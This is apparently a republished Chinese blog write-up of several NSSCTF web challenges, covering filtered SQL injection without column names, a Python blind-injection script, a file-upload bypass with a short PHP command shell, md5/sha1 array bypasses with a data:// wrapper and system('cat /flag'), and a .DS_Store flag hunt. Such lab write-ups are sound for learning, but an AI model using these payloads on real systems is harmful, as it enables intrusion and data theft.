NSSCTF第14页（3）

2023-12-13 07:46:07

[HNCTF 2022 WEEK2]easy_sql

题目提示说是无列名注入

CTF|mysql之无列名注入 - 知乎

SQL注入之无列名注入原理详解_sql无列名注入_Jay 17的博客-CSDN博客

深入浅出带你学习无列名注入-CSDN博客

先进行fuzz测试

过滤了很多东西

information_schema 被过滤 -> 无列名注入

order 被过滤 -> group 替换

空格 -> /**/

注释符? -> '1? ;%00

判断回显位

1'/**/union/**/select/**/1,2,3/**/'1

查数据库

1'/**/union/**/select/**/1,2,group_concat(database_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

查表

1'/**/union/**/select/**/1,2,group_concat(table_name)/**/from/**/mysql.innodb_table_stats/**/where/**/'1

拿flag用无列名注入

1'/**/union/**/select/**/1,2,`1`/**/from/**/(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx/**/where/**/'1

也可以用位或注入

import requests

url='ip/index.php'
flag = ''
count = 1
while True:
??? for i in range(32, 127):
??????? data = {
??????????? # "id": f"1'|if(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)where(database_name=database())),{count},1))={i},1,2)||'"
??????????? # "id": f"1'|if(ascii(substr((select/**/database_name/**/from/**/mysql.innodb_table_stats/**/group/**/by/**/database_name/**/LIMIT/**/0,1),{count},1))={i},1,2)||'"
??????????? # "id": f"1'|if(ascii(substr((select/**/group_concat(database_name)from/**/mysql.innodb_table_stats),{count},1))={i},1,2)||'"

??????????? # "id": f"1'|if(ascii(substr((select(group_concat(table_name))from(mysql.innodb_table_stats)),{count},1))={i},1,2)||'"

??????????? "id": f"1'|if(ascii(substr((select(group_concat(`1`))from(select/**/1/**/union/**/select/**/*/**/from/**/ctftraining.flag)xxx),{count},1))={i},1,2)||'"
??????? }
??????? resp = requests.post(url=url, data=data)
??????? #print(resp.text)
??????? if 'Here is your want!' in resp.text:
??????????? flag += chr(i)
??????????? print(flag)
??????????? break
??????? elif i == 126:
??????????? exit()
??????? #time.sleep(0.1)
??? count += 1

[FSCTF 2023]是兄弟，就来传你の🐎！

尝试了好几种，phtml、php3、php5、user.ini、.htaccsee都不行

尝试pht发现成功，说是文件太长了，利用php短命令

<?=`nl /*`;

或者

<?=`cat /*`;

?发现还是说长，把文件头改成BM或者GIF

上传成功

访问得到flag

[SWPUCTF 2023 秋季新生赛]一键连接!?

审计一下

md5_1&md5_2不等，但是其md5值相等，没限制什么，数组绕过就可以

?md5_1[]=1&md5_2[]=2

&sha1_1&sha1_2也是一样，没限制，就数组绕

sha1_1[]=3&sha1_2[]=4

new_player=Welcome to NSSCTF!!!

发现还是绕不过去，后面发现是传参错误了，

new_player应该用data协议来传

执行成功

payload:

get:??? ?md5_1[]=1&md5_2[]=2&sha1_1[]=3&sha1_2[]=4&new_player=data://text/plain,Welcome to NSSCTF!!!

post:??? Nss=system('cat /flag');

?[NSSRound#13 Basic]flask?jwt?(hard)

正常思路：

注册一个信息，然后登录，之后找到cookie以及secret

但是我做这道题的时候莫名其妙注册不了

然后看评论找到secret所在地，抓包找到了cookie

参考这篇文章，环境好像坏掉了

NSSCTF web 刷题记录1__rev1ve的博客-CSDN博客

[FSCTF 2023]寻找蛛丝马迹

点击后，页面颜色乱跳

看源代码发现第一段flag

看css找到第二段

第三段

扫描出来

访问robots.txt

用火狐工具中定制工具栏中的修复文字编码来修复

第五段说是和苹果有关系访问.DS_store

第一次知道

.ds store是什么文件 - 知百科?

下载源码

找到了最后一个

得到了flag

文章来源:https://blog.csdn.net/wwwwyyyrre/article/details/134798246
本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若内容造成侵权/违法违规/事实不符，请联系我的编程经验分享网邮箱：veading@qq.com进行投诉反馈，一经查实，立即删除！